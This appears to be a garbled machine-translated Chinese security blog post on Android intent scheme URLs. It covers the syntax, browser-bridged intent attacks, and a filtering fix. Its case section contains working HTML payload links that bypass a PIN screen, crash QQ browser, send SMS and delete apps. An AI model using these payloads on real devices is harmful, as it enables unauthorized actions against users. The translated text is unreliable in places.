Android Chrome IFRAME settings src property cannot start app

0x01 Android Intents with Chrome

Android has a feature that few people know can send intent via a Web page to launch apps. The app was previously launched via the Web page by setting the SRC attribute of the IFRAME, for example:

<iframe src="paulsawesomeapp://page1"> </iframe>

This method applies to version 18 or earlier. Other Android browsers are also available. This feature was changed after Android Chrome version 25. You cannot start the app by setting the SRC attribute of the IFRAME tag. Instead, you should use the custom scheme to implement user gestures to start the app or using the "intent:" syntax described in this article.

1.1 Basic syntax

"Best Practice" is to construct a intent Insert page that enables users to log in to the app. This gives you more flexibility in controlling how applications are started, including passing additional information via intent extras. The basic syntax for the intent-based URI is as follows:

intent:   HOST/URI-path // Optional host   #Intent;      package=[string];      action=[string];      category=[string];      component=[string];      scheme=[string];   end;

Syntax details see source Android sources

1.2 Simple example

The example is a intent login application "Zxing barcode scanner" with the following syntax:

intent:   //scan/   #Intent;      package=com.google.zxing.client.android;      scheme=zxing;   end;

Set the a label to send the href attribute:

<a href="intent://scan/#Intent;scheme=zxing;package=com.google.zxing.client.android;end"> Take a QR code </a>

Package and host definitions in the configuration file for Android Zxing Manifest

1.3 Precautions

This can also be included if the intent that invokes the activity contains extras. Activity is only configured with the category filter to be Android.intent.category.BROWSABLE in the browser in this way, as this indicates that it is safe.

1.4 See Also

android Intents and Intent Filters

Android Activities

0x02 Use of ideas

Intent-based attacks on Android are common, and this kind of attack can cause applications to crash, which may evolve to exploit the right vulnerabilities. Of course, intent-based's malicious samples can be easily identified by static feature matching. However, there has been a recent attack on an Android browser-based attack--intent Scheme URLs. This attack takes advantage of the lack of browser protection, and indirectly realizes the intend-based attack through the browser as a bridge. This is a very covert approach compared to ordinary intend-based attacks, and traditional feature matching is completely ineffective due to malicious code hiding webpage. In addition, this attack can also directly access the browser's own components (whether public or private) and private files, such as cookie files, resulting in the disclosure of user confidential information.

0x03 1.3 Intent Scheme URL usage

Take a look at the use of the intent Scheme URL.

<script>location.href = "intent:mydata#Intent;action=myaction;type=text/plain;end"</script>  

From the usage point of view, it is well understood that the code here is equivalent to the following Java code:

Intent intent = new Intent("myaction");  intent.setData(Uri.parse("mydata"));  intent.setType("text/plain");  

Let's look at an example:

The above statement is equivalent to the following Java code:

Intent intent = new Intent("myaction");  intent.setData(Uri.pase("//foobar/"));  intent.putExtra("xyz", "123");  intent.putExtra("abc", 678);  

where s represents a string of type key-value,i represents an int of type Key-value. Intent.parseuri (String uri) static method is provided in the source code, this method can directly parse the URI, if you want to know more about the syntax, you can view the official source code.

Parsing and filtering of 0x04 Intent scheme URI

If the browser supports the intent Scheme URI syntax, it is generally handled in three steps:

1. Using Intent.parseuri to parse the URI, get the original intent object;
2. Set the filter rules for intent objects, different browsers have different policies, the following will be described in detail;
3. Send intent via context.startactivityifneeded or context.startactivity, where step 2 plays a key role, the filtering rule is missing or there are flaws that can cause intent Schem URL attacks.

Key functions

Intent.parseUri()

Bypass

Intent.setComponent(null);

Use SEL;

0x05 Cloud Case

WOOYUN:QQ Browser Intentscheme improperly handled

Wooyun: Proud cloudbrowser Browser Remote Privacy Disclosure Vulnerability (requires certain conditions)

A browser is very good for this support

<a href="intent:#Intent;action=android.settings.SETTINGS;S.:android:show_fragment=com.android.settings.ChooseLockPassword$ChooseLockPasswordFragment;B.confirm_credentials=false;end">   设置绕过Pin码（android 3.0-4.3）</a>

<a href="intent:#Intent;component=com.tencent.mtt/com.tencent.mtt.debug.DbgMemWatch;end">    qq浏览器崩溃</a>

<a href="intent:http://drops.wooyun.org/webview.html#Intent;component=com.android.browser/com.android.browser.BrowserActivity;end">    打开原生浏览器</a>

<a href="intent:smsto:10000#Intent;action=android.intent.action.SENDTO;end">   发送短信</a><br>

<a href="intent:#Intent;action=android.media.action.STILL_IMAGE_CAMERA;end">   打开相机</a><br>

<a href="intent:package:org.wooyun.hiwooyun#Intent;action=android.intent.action.DELETE;end">   删除应用</a><br>

<a href="intent:#Intent;action=android.intent.action.INSERT_OR_EDIT;S.name=magic;S.phone=+8610000;i.phone_type=2;type=vnd.android.cursor.item/person;end">    添加联系人</a><br>

0x06 Repair

Through the description of the above vulnerability, a relatively safe intent filter method is summarized, the code is as follows:

// convert intent scheme URL to intent object  Intent intent = Intent.parseUri(uri);  // forbid launching activities without BROWSABLE category  intent.addCategory("android.intent.category.BROWSABLE");  // forbid explicit call  intent.setComponent(null);  // forbid intent with selector intent  intent.setSelector(null);  // start the activity by the intent  context.startActivityIfNeeded(intent, -1);  

0x07 Reference

Http://www.mbsd.jp/Whitepaper/IntentScheme.pdf http://blog.csdn.net/l173864930/article/details/36951805

Android Chrome IFRAME settings src property cannot start app